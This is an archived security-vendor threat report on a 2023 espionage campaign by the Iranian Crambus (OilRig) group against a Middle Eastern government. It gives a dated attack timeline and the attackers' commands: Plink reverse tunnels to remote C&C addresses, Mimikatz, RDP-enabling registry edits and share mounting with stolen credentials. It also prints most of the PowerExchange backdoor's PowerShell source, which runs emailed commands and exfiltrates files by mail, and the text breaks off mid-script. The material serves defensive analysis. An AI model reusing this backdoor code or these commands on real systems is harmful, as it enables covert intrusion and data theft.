{
	"id": "122862eb-c9a8-4e77-aa27-d7ee8dc9798c",
	"created_at": "2026-04-06T00:11:53.213041Z",
	"updated_at": "2026-04-10T13:13:05.065905Z",
	"deleted_at": null,
	"sha1_hash": "cd1dcf4cafcbbfda661f8deb763e38a1905a714e",
	"title": "Crambus: New Campaign Targets Middle Eastern Government",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 208347,
	"plain_text": "Crambus: New Campaign Targets Middle Eastern Government\r\nArchived: 2026-04-05 13:33:04 UTC\r\nThe Iranian Crambus espionage group (aka OilRig, APT34) staged an eight-month-long intrusion against a government in\r\nthe Middle East between February and September 2023. During the compromise, the attackers stole files and passwords and,\r\nin one case, installed a PowerShell backdoor (dubbed PowerExchange) that was used to monitor incoming mails sent from\r\nan Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded\r\nresults to the attackers. Malicious activity occurred on at least 12 computers and there is evidence that the attackers\r\ndeployed backdoors and keyloggers on dozens more.\r\nIn addition to deploying malware, the attackers made frequent use of the publicly available network administration tool\r\nPlink to configure port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop\r\nProtocol (RDP). There is also evidence the attackers modified Windows firewall rules in order to enable remote access.\r\nBackground\r\nCrambus is a long-running Iranian espionage group that has mounted operations against targets in multiple countries,\r\nincluding Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the U.S., and\r\nTurkey.\r\nThe group is known to stage long-running intrusions for intelligence gathering and spying purposes. In recent years it has\r\nadded a heavy social engineering component to the early stages of its attacks.\r\nIt most recently came to attention last year, when Microsoft linked the group to a destructive attack against the Albanian\r\ngovernment. It assessed that Crambus was involved in gaining initial access and exfiltrating data from impacted networks.\r\nWipers were likely then deployed by other Iran-linked actors. 
\r\nToolset Used\r\nDuring this latest attack, Crambus deployed three previously undiscovered pieces of malware, along with the\r\nPowerExchange backdoor, a known backdoor that hadn’t yet been attributed to Crambus. In addition to malware, the\r\nattackers made use of a number of living-off-the-land and legitimate tools.\r\nBackdoor.Tokel: Has the ability to execute arbitrary PowerShell commands and download files. The command and\r\ncontrol (C\u0026C) address is stored in a separate, RC4 encrypted file called token.bin, which is saved in the working\r\ndirectory.\r\nTrojan.Dirps: Used to enumerate all files in a directory and execute PowerShell commands.\r\nInfostealer.Clipog: Information stealing malware that is capable of copying clipboard data, capturing keystrokes and\r\nlogging processes where keystrokes are entered.\r\nBackdoor.PowerExchange: PowerShell-based malware that can log into an Exchange Server with hardcoded\r\ncredentials and monitor for emails sent by the attackers. It uses an Exchange Server as a C\u0026C. Mails received with\r\n“@@\" in the subject contain commands sent from the attackers which allows them to execute arbitrary PowerShell\r\ncommands, write files and steal files. The malware creates an Exchange rule (called ‘defaultexchangerules’) to filter\r\nthese messages and move them to the Deleted Items folder automatically.\r\nMimikatz: Publicly available credential dumping tool. \r\nPlink: A command-line connection tool for the PuTTY SSH client\r\nAttack Timeline\r\nThe first evidence of malicious activity on the target’s network occurred on February 1, 2023, when an unknown PowerShell\r\nscript (file name: joper.ps1) was executed from a suspicious directory: CSIDL_PROFILE\\public\\sat. The same script was\r\nexecuted multiple times on the same computer (Computer 1) over the next seven days. 
\r\nFour days later, on February 5, the attackers accessed a second computer (Computer 2) and a renamed version of Plink\r\n(msssh.exe), a command-line connection tool for the PuTTY SSH client, was used to configure port-forwarding rules\r\nallowing for RDP access from a remote host:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 1 of 16\n\nCSIDL_PROFILE\\public\\sat\\msssh.exe 151.236.19[.]91 -P [REMOVED]-C -N -R 0.0.0.0:54231:127.0.0.1:3389 -l\r\n[REMOVED] -pw [REMOVED]\r\nThis masqueraded Plink (mssh.exe) was executed repeatedly on this computer up until February 12.\r\nOn February 21, malicious activity commenced on a web server (Web Server 1) when a netstat command was executed to\r\nretrieve a full list of all TCP and UDP connections.\r\nnetstat /an\r\nThe netstat command line switches perform the following actions:\r\n/a: Tells netstat to display all connections and listening ports.\r\n/n: Tells netstat to display numerical addresses instead of resolving hostnames to IP addresses. \r\nNext, Plink (mssh.exe) was launched again to enable remote RDP access. After this occurred, there was evidence that a\r\nPowerShell script was used to mount the C: drive of another computer on the network.\r\nOn April 8, the attackers gained access to a third computer (Computer 3), where another variant of Plink was executed from\r\nthe %USERPROFILE%\\public directory and was used to forward port 3389 to port 999 on all available interfaces:\r\nCSIDL_PROFILE\\public\\plink.exe [REMOVED] -pw [REMOVED] -P [REMOVED] -2 -4 -T -N -C -R\r\n0.0.0.0:999:127.0.0.1:3389\r\nThe options supplied in the command perform the following actions:\r\n-2 -4: Enable SSH Version 2 and IPv4 protocol for the connection.\r\n-T: Requests a pseudo-terminal for the remote session.\r\n-N: Prevents running a remote command and often used for setting up a port\r\n-R 0.0.0.0:999:127.0.0.1:3389: Specifies remote port forwarding. 
It instructs the remote server to listen on Port 999\r\nof all network interfaces (0.0.0.0) and forward any incoming connections to Port 3389 (127.0.0.1:3389) on the local\r\nmachine (the machine where the command has been run). This effectively sets up a tunnel that allows the attackers to\r\naccess a remote service such as RDP through the SSH connection.\r\nAt the same time, an unknown batch file was executed, which redirected output to a text file in the\r\n%USERPROFILE%\\public directory.\r\ncmd /c CSIDL_PROFILE\\public\\p2.bat \u003e CSIDL_PROFILE\\public\\001.txt 2\u003e\u00261\r\nImmediately afterwards, the same Plink command was run a second time. This is followed by the same unknown batch\r\nscript being executed several more times.\r\nLater that day, Mimikatz was executed from the %TEMP% directory to dump credentials.\r\nOn April 9, another netstat command was run on a new compromised computer, the Domain Controller (Computer 4):\r\nnetstat /aon\r\nThe “o” option adds the process ID (PID) of the associated process that's using each network connection or listening port.\r\nThe command will provide a list of all active network connections, both incoming and outgoing, along with the associated\r\nPID of the processes using those connections. Three hours later, Mimikatz was run again to dump credentials.\r\nThe next day, April 10, an unknown windows batch file (file name: p.bat) was executed on Computer 3. This was followed\r\nby a Plink command: \r\nplink.exe ssh 78.47.218[.]106 1234qweRRR 443 10999 10.75.45.222 3389\r\nThe options perform the following actions:\r\nssh: Indicates SSH protocol is being used for the connection.\r\n78.47.218[.]106: The IP address of the remote server being connected to using SSH.\r\n1234qweRRR: Likely a password required to authenticate to the remote server. 
\r\n443: Port number for the SSH connection on the remote server.\r\n10999: The local port number that Plink uses to create a tunnel.\r\n10.75.45.222: IP address of local machine or network. \r\n3389: Remote Desktop Protocol (RDP) port number. This indicates that traffic is being forwarded from the remote\r\nserver's port 3389 to a local machine for remote desktop access.\r\nThe command is used to set up a port forwarding tunnel from the compromised machine as a means to access the remote\r\nserver’s RDP service as if it was running locally. \r\nOn April 23, activity resumed on Computer 3, when previously unseen malware named Backdoor.Tokel (file name:\r\ntelecomm.exe) was executed. \r\nOn May 7, a suspicious PowerShell command was executed on the Domain Controller (Computer 4) to run an unknown\r\nscript (file name: hwf.ps1).\r\nMalicious activity appeared to cease for nearly a month until June 4, when Backdoor.Tokel was executed again on Computer\r\n3. On June 17, a suspicious PowerShell command was executed on the Domain Controller (Computer 4) in order to run\r\nanother unknown script (file name: zone.ps1).\r\nHarvesting Emails\r\nOn June 20, Backdoor.PowerExchange (file name: setapp.ps1) was run on Computer 3.\r\nThe PowerShell-based backdoor is designed to execute commands received from the attackers. This is done by logging into\r\ncompromised mailboxes on an Exchange Server and monitoring for incoming emails from the attackers. 
Emails that contain\r\n“@@” in the subject line are read by Backdoor.PowerExchange and have the ability to execute commands received from the\r\nattackers, effectively using the Exchange Server as a C\u0026C.\r\nThe script allows four commands to execute:\r\nIf an attachment is detected, it will decode it using Base64 and run it via PowerShell.\r\ncf: Decodes a Base64 string in the body of the email and executes it via PowerShell. The result of the command is\r\nsent back to the attacker via email.\r\nuf: Decodes the file path and the file contents using Base64 and calls WriteAllBytes to write the file to the system. \r\ndf: Encodes a specified file with Base64 and sends it to the attacker via email. If the file is larger than 5 MB it sends\r\nthe following message to the attacker: \"Size is Greater than 5 MB\".\r\nThe attackers likely installed the script on an ordinary computer on the network in order to avoid raising suspicions created\r\nby anomalous network traffic, since internal connections to an Exchange Server are expected behavior. \r\nMalicious Activity Continues\r\nOn July 1, the attackers once again utilized the masqueraded version of Plink to open a tunnel on Computer 3 by redirecting\r\nRDP to Port 12345 on any listening interface, effectively allowing external connections over RDP to the compromised\r\nmachine. The next day, July 2, the attackers used netstat to list all open and listening TCP and UDP ports. It's possible the\r\nattackers were checking that the SSH tunnel was still active.\r\nOn July 8, the attackers used the Domain Controller (Computer 4) to create a service on a remote host (10.75.45[.]222) to\r\nrun an unknown script (file name: pl.bat). The service was configured to auto-start during the boot up process. \r\nOver the next two days, July 9 and 10, another new piece of malware named Trojan.Dirps (file name: virtpackage.exe) was\r\nrepeatedly executed on Computer 3. 
\r\nOn July 11, the attackers introduced more malicious tools to Computer 3, installing a third new piece of malware named\r\nInfostealer.Clipog (file name: poluniq.exe) which is used to capture keystrokes and steal clipboard contents. \r\nThe next day (July 12) the attackers ran Mimikatz on the Domain Controller (Computer 4) to dump credentials. \r\nOn July 15, the attackers again ran the unknown PowerShell script (zone.ps1) on the Domain Controller (Computer 4),\r\nfollowed by a second unknown script (copy.ps1). \r\nOn July 18, the attackers again executed Infostealer.Clipog on Computer 3 before creating an SSH tunnel using Plink to\r\naccess RDP services. This SSH tunnel was created again on August 3.\r\nOn August 6, yet another unknown PowerShell script (file name: tnc.ps1) was executed on the Domain Controller\r\n(Computer 4). Immediately afterwards, Nessus vulnerability scans were observed, specifically hunting for Log4j vulnerabilities\r\non other machines on the network. While this could have been legitimate vulnerability scanning activity, not long afterwards\r\nnetsh was executed to list all firewall rules. \r\nCSIDL_SYSTEM\\netsh.exe advfirewall firewall show rule name=[REMOVED] verbose\r\nFollowing this, another PowerShell script was executed. The script appeared to be designed to query and collect information\r\nabout local user groups and their members on a Windows system. Its output was information about SIDs, names, object\r\nclasses, and principal sources of local user groups and their members in a structured format. 
\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell -NoProfile -Command ;\u0026 {$j = sajb {$ErrorActionPreference =\r\n'SilentlyContinue';$groups = Get-LocalGroup | Select-Object Name, Domain, SID;foreach($g in $groups){-\r\njoin($g.SID,'|',$g.Name);$members = Get-LocalGroupMember -SID $g.SID | Select *;foreach($m in $members){-join('\r\n',$m.SID,'|',$m.Name,'|',$m.ObjectClass,'|',$m.PrincipalSource);}}};$r = wjb $j -Timeout 300; rcjb $j;};\r\nAfter this, net.exe was used to list all mapped drives, before WMI (Windows Management Instrumentation) was used to\r\nexecute Plink in order to open port-forwarding on the compromised host, allowing for remote RDP access.\r\nOn August 7 and again on August 12, Plink was downloaded from the internet on to the Domain Controller (Computer 4)\r\nand saved as \\ProgramData\\Adobe.exe. \r\nOn August 30, the attackers obtained access to a second web server (Web Server 2). They first used Plink to enable access to\r\nRDP on Port 12345 from their C\u0026C server (91.132.92[.]90). They then installed Infostealer.Clipog using a different file\r\nname (fs-tool.exe). \r\nThe next day, August 31, the attackers established a tunnel once again to open RDP access on Port 4455 from their C\u0026C.\r\nOutput was redirected to a text file (file name: 001.txt). There may have been some issues connecting as the attackers later\r\nattempted to create the same tunnel, this time using Port 12345.\r\nOn September 1, the attackers shifted their attention to three more computers (Computer 5, Computer 6 and Computer 7),\r\nusing Certutil to download Plink to each machine. They then executed an unknown PowerShell script (file name: joper.ps1)\r\non Web Server 2. \r\nOn September 2, the attackers ran the following netstat command on Web Server 2:\r\nnetstat -a\r\nThis command is used to list all active connections. 
The unknown PowerShell script (file name: joper.ps1) was then run\r\nagain.\r\nOn September 3, the attackers once again ran joper.ps1 before two suspicious Wireshark commands were executed:\r\n;CSIDL_SYSTEM_DRIVE\\program files\\wireshark\\extcap\\usbpcapcmd.exe; --extcap-interfaces --extcap-version=4.0\r\n;CSIDL_SYSTEM_DRIVE\\program files\\wireshark\\dumpcap.exe; -D -Z none\r\nWireshark’s usbpcapcmd utility was used to capture USB traffic on specified USB devices and save the captured data to a\r\nfile. Similarly, dumpcap was used to capture network packets.\r\nUsbpcapcmd:\r\n--extcap-interfaces: This option is used to list available external capture interfaces.\r\n--extcap-version=4.0: Sets the version of Extcap to 4.0 (ensuring compatibility with Wireshark).\r\nDumpcap:\r\n-D: Used to list all available capture interfaces.\r\n-Z none: Sets the capture filter to “none” meaning that all packets on a specified interface should be captured.\r\nIt appears the attackers were interested in identifying any available network or USB interfaces from which they could\r\ncapture packets on the machine. 
\r\nImmediately afterwards, a suspicious netstat command ran:\r\nnetstat -a -n\r\nThis will list all active connections and print them to standard output in numerical form.\r\nAfter joper.ps1 was once again executed, the attackers turned their attention back to Computer 3, where they ran a number\r\nof reg.exe commands:\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\ncmd.exe /c reg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v\r\nfDenyTSConnections /t REG_DWORD /d 0 /f\r\ncmd.exe /c reg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v\r\nfDenyTSConnections /t REG_DWORD /d 0 /f\r\nThese commands were used to modify system configuration to enable Terminal Services (i.e. remote access) to the computer\r\nvia RDP.\r\nA few hours later, a suspicious net.exe command was executed to mount the c$ share of another machine using stolen\r\ncredentials.\r\n;CSIDL_SYSTEM\\net.exe; use \\\\[REMOVED]\\c$ /user:[REMOVED] [REMOVED]\r\nOn September 4, the attackers executed three different variants of the joper.ps1 script on Web Server 2. They then turned\r\ntheir attention back to Computer 1, where a new variant of the Backdoor.Tokel malware was installed on the computer. \r\nThe next day, September 5, the attackers once again ran the joper.ps1 script on Web Server 2, while using net.exe to mount\r\nand unmount various network shares. 
They then executed Backdoor.Tokel on Computer 3 again before installing it on two\r\nmore computers (Computer 9 and Computer 10). \r\nMalicious activity continued until September 9, with the attackers largely focusing their attention on Web Server 2, running\r\nthe joper.ps1 script and mounting/unmounting network shares.\r\nContinuing Threat\r\nCrambus is a long-running and experienced espionage group that has extensive expertise in carrying out long campaigns\r\naimed at targets of interest to Iran. After a 2019 leak of its toolset, there was some speculation that Crambus may disappear.\r\nHowever, its activities over the past two years demonstrate that it represents a continuing threat for organizations in the\r\nMiddle East and further afield. \r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nPowerExchange Script\r\n$OutputEncoding = [console]::InputEncoding = [console]::OutputEncoding = New-Object System.Text.UTF8Encoding\r\n$dir=\"$env:PUBLIC\\MicrosoftEdge\"\r\n$directory = get-childitem -Path\"$($dir)\\*\"   -Include'config.conf'\r\n$userid = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME))\r\n$mailList = New-Object Collections.Generic.List[String]\r\n$mailList.Add('Ahmed_Alrashed20@outlook.com')\r\n$subject =\"Update Microsoft Edge\"\r\n$body =\r\n\"Microsoft Edge Update\"\r\n$rule =\"defaultexchangerules\"\r\nfunction addrule\r\n{\r\n$NewRule = [Microsoft.Exchange.WebServices.Data.Rule]::new()\r\n$NewRule.DisplayName = $rule\r\n$NewRule.Priority =1\r\n$newRule.IsEnabled = $true;\r\n$NewRule.Conditions.ContainsSubjectStrings.Add(\"@@\")\r\n$NewRule.Actions.MoveToFolder = [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::DeletedItems\r\n$CreateRuleOperation = [Microsoft.Exchange.WebServices.Data.CreateRuleOperation]::new($NewRule)\r\n$ExchangeService.UpdateInboxRules([Microsoft.Exchange.WebServices.Data.RuleOperation[]]@($CreateRuleOperation),$true)\r\n}\r\nfunction connection\r\n{\r\nadd-type @\"\r\nusing System.Net;\r\nusing System.Security.Cryptography.X509Certificates;\r\npublic   class   TrustAllCertsPolicy : ICertificatePolicy {\r\npublic   bool CheckValidationResult(\r\nServicePoint srvPoint, X509Certificate certificate,\r\nWebRequest request,int   certificateProblem) {\r\nreturn   true;\r\n}\r\n}\r\n\"@\r\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\r\n$dllpath = get-childitem -Path\"$($dir)\\*\"   
-Include'Microsoft.Exchange.WebServices.dll'\r\ntry{[void][Reflection.Assembly]::LoadFile($dllpath.FullName)}catch{$_.Exception | Out-File -\r\nFilePath\"$($dir)\\EWSERROR.txt\"   -Append;exit}\r\n$global:ExchangeService = New-Object Microsoft.Exchange.WebServices.Data.ExchangeService\r\n$ExchangeService.UserAgent =\"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\";\r\n$urllist = @([System.Uri][REMOVED],[System.Uri] [REMOVED] ,[System.Uri] [REMOVED])\r\n$userlist = @([REMOVED], [REMOVED] )\r\nforeach($item in $userlist )\r\n{\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 7 of 16\n\n$username=$item.split('||')[0]\r\n$password=$item.split('||')[2]\r\nif(-not [string]::IsNullOrEmpty($username))\r\n{\r\n$ExchangeService.Credentials = New-Object\r\nMicrosoft.Exchange.WebServices.Data.WebCredentials($username,$password)\r\nforeach($url in $urllist)\r\n{\r\n$ExchangeService.Url=$url\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}\r\ncatch{\"URL: \"+$url.Host+[Environment]::NewLine+\"User: \"+$username+\r\n[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath\"$($dir)\\EWSERROR.txt\"   -Append}\r\n}\r\n}\r\n$exchangeservice.UseDefaultCredentials=$true\r\nforeach($url in $urllist)\r\n{\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   
$true\r\n}\r\ncatch{}\r\n}\r\nif(-not [string]::IsNullOrEmpty($username))\r\n{\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 8 of 16\n\n$ExchangeService.Credentials = New-Object\r\nMicrosoft.Exchange.WebServices.Data.WebCredentials($username,$password)\r\ntry\r\n{\r\n$ExchangeService.AutodiscoverUrl($username)\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}catch{}\r\n}catch{}\r\n}\r\n$exchangeservice.UseDefaultCredentials = $true\r\ntry\r\n{\r\n$ExchangeService.AutodiscoverUrl($username)\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}catch{}\r\n}catch{Continue}\r\n}\r\n}\r\nfunction clean\r\n{\r\n$folder = New-Object\r\nMicrosoft.Exchange.WebServices.Data.FolderId([Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\ntry{$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($exchangeservice,$folder)}catch{}\r\n$iv = New-object Microsoft.Exchange.WebServices.Data.ItemView(10)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 9 of 16\n\n$inboxitems= $inboxfolder.FindItems($iv)\r\n$itemIds = $inboxitems.id.UniqueId\r\nforeach($itemId in $itemIds)\r\n{\r\ntry{$message = 
[Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$itemId)}catch{}\r\nif($mailList.Contains($message.ToRecipients.Name))\r\n{\r\n$message.Delete('HardDelete')\r\n}\r\n}\r\n}\r\nfunction sendMessage\r\n{param([string]$mail,[string]$data)\r\n$message = New-Object Microsoft.Exchange.WebServices.Data.EmailMessage($ExchangeService)\r\n$Resultb64Bytes = [System.Text.Encoding]::UTF8.GetBytes($data)\r\n$message.ToRecipients.Add($mail)\r\n$message.Subject = $subject\r\n$message.Body = $body\r\n$message.Attachments.AddFileAttachment(\"New Text Document.txt\",$Resultb64Bytes)\r\ntry{$message.Send()}catch{}\r\nStart-Sleep -Seconds15\r\nclean\r\n}\r\nfunction verify\r\n{\r\n$response = New-Object Collections.Generic.List[String]\r\n$Inbox = [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox\r\n$DeletedItems=[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::DeletedItems\r\n$JunkEmail=[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::JunkEmail\r\n$folders=@($DeletedItems,$Inbox,$JunkEmail)\r\nforeach($f in $folders)\r\n{\r\n$folder = New-Object Microsoft.Exchange.WebServices.Data.FolderId($f)\r\ntry{$inboxfolder=[Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,$folder)}catch{}\r\n$iv = New-object Microsoft.Exchange.WebServices.Data.ItemView(10)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 10 of 16\n\n$searchFilter = New-Object\r\nMicrosoft.Exchange.WebServices.Data.SearchFilter+ContainsSubstring([Microsoft.Exchange.WebServices.Data.ItemSchema]::subject,'@@')\r\n$result = $ExchangeService.FindItems($folder,$searchFilter,$iv)\r\nif(-not [string]::IsNullOrEmpty($result))\r\n{\r\n$ItemIds = $result.id.UniqueId\r\nforeach($ItemId in $ItemIds)\r\n{\r\ntry{$x=[Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$ItemId)}catch{}\r\n$mailSender = $x.sender.Address\r\n$xx = $x.Subject 
-match\"@@(.*)@@\"\r\ntry{$id=$Matches[1]}catch{}\r\nif(-not [string]::IsNullOrEmpty($id))\r\n{\r\nif($id -eq $userid )\r\n{\r\n$response.Add(\"planA\")\r\n$response.Add($ItemId)\r\nreturn   $response\r\n}\r\n}\r\nelseif($flag -eq $false)\r\n{\r\n$response.Add(\"planB\")\r\n$response.Add($mailSender)\r\nreturn   $response\r\n}\r\n}\r\n}\r\n}\r\nreturn   $response\r\n}\r\nfunction main{\r\nParam\r\n(\r\n[string] $ItemId\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 11 of 16\n\n)\r\ntry{$message=[Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$ItemId)}catch{}\r\n$mailSender = $message.Sender.Address\r\n$message.IsRead=$true\r\n$message.Update([Microsoft.Exchange.WebServices.Data.ConflictResolutionMode]::AutoResolve)\r\nforeach($attachment in $message.Attachments)\r\n{\r\n$attachment.Load()\r\n$RawData = ([System.Text.Encoding]::UTF8.GetString($attachment.Content)).substring(7)\r\nif   ($RawData.Length%4   -ne0)\r\n{\r\n$newRawData = $RawData.PadRight(($RawData.Length+$RawData.Length%4),'=')\r\n$Data =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newRawData))\r\n}else{\r\n$Data = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($RawData))\r\n}\r\niex($Data)\r\n$message.Delete('HardDelete')\r\nif($cf -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $cmd.GetEnumerator())\r\n{\r\nif   (($h.value).Length%4   -ne0)\r\n{\r\n$newValue = ($h.value).PadRight((($h.value).Length+($h.value).Length%4),'=')\r\n$com =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newValue))\r\n}else{\r\n$com =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h.value))\r\n}\r\nif(![string]::IsNullOrEmpty($com))\r\n{\r\n$run = iex $com | out-string\r\n$extb64 = 
[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 12 of 16\n\n$Total\r\n+=\"$($uuid)$($userid):$($h.Name):$($uuid)$([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"$run\"))):$($uu\r\n[System.Environment]::Newline\r\n}\r\n}\r\nsendMessage $mailSender $Total\r\n}\r\nif($df -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $dl.GetEnumerator())\r\n{\r\nif   (($h.value).Length%4   -ne0)\r\n{\r\n$newpath = $($h.value).PadRight(($($h.value).Length+$($h.value).Length%4),'=')\r\n$path =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newpath)).Replace('\"',\"\")\r\n}else{\r\n$path =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h.value)).Replace('\"',\"\")\r\n}\r\n$size = (Get-Item $path).Length\r\nif($size -lt 5mb )\r\n{\r\n$DataBytes= [System.IO.File]::ReadAllBytes($path)\r\n$Datab64 = [Convert]::ToBase64String($DataBytes)\r\n$ext = [System.IO.Path]::GetExtension($path)\r\n$extb64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($ext))\r\n}\r\nelse\r\n{\r\n$Datab64= [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"Size is\r\nGreater than 5 MB\"))\r\n$extb64= [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\n}\r\n$Total +=\"$($uuid)$($userid):$($h.Name):$($uuid)$($Datab64):$($uuid)$($extb64)\"+\r\n[System.Environment]::Newline\r\n}\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 13 of 16\n\nsendMessage $mailSender $Total\r\n}\r\nif($uf -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $up.GetEnumerator())\r\n{\r\n$Fileb64 = ($h.value).split(':')[0]\r\n$Pathb64 = ($h.value).split(':')[1]\r\nif   
($Pathb64.Length%4   -ne0)\r\n{\r\n$newpathb64 = $Pathb64.PadRight(($Pathb64.Length+$Pathb64.Length%4),'=')\r\n$path_save =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newpathb64)).Replace('\"','')\r\n}else{\r\n$path_save =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Pathb64)).Replace('\"','')\r\n}\r\nif   ($Fileb64.Length%4   -ne0)\r\n{\r\n$newFileb64 = $Fileb64.PadRight(($Fileb64.Length+$Fileb64.Length%4),'=')\r\n$Fileb64Bytes = [System.Convert]::FromBase64String($newFileb64)\r\n}else{\r\n$Fileb64Bytes = [System.Convert]::FromBase64String($Fileb64)\r\n}\r\n[System.IO.File]::WriteAllBytes($path_save,$Fileb64Bytes)\r\n$Datab64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"file\r\nupload\"))\r\n$extb64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\n$Total +=\"$($uuid)$($userid):$($h.Name):$($uuid)$($Datab64):$($uuid)$($extb64)\"+\r\n[System.Environment]::Newline\r\n}\r\nsendMessage $mailSender $Total\r\n}\r\n}}\r\nFunction listen\r\n{\r\n$timer = [System.Diagnostics.Stopwatch]::StartNew()\r\nwhile(($timer.Elapsed.TotalMinutes -lt5) -and (([string]::IsNullOrEmpty($value))))\r\n{\r\n$value = verify\r\nStart-Sleep -Seconds10\r\n}\r\n$timer.Stop()\r\nif(-not[string]::IsNullOrEmpty($value))\r\n{\r\nif($value[0] -eq\"planA\")\r\n{\r\nreturn   $true\r\n}\r\nif($value[0] -eq\"planB\")\r\n{\r\n$mailList+= $value[1]\r\nsendMessage $value[1] $userid\r\nreturn   $true\r\n}\r\n}\r\nelse\r\n{\r\nreturn   $false\r\n}\r\n}\r\nfunction alive\r\n{\r\nforeach ($mail in $mailList)\r\n{\r\nsendMessage $mail $userid\r\n$liste = listen\r\nif($liste -eq $true)\r\n{\r\nreturn   $true\r\n}\r\n}\r\nreturn 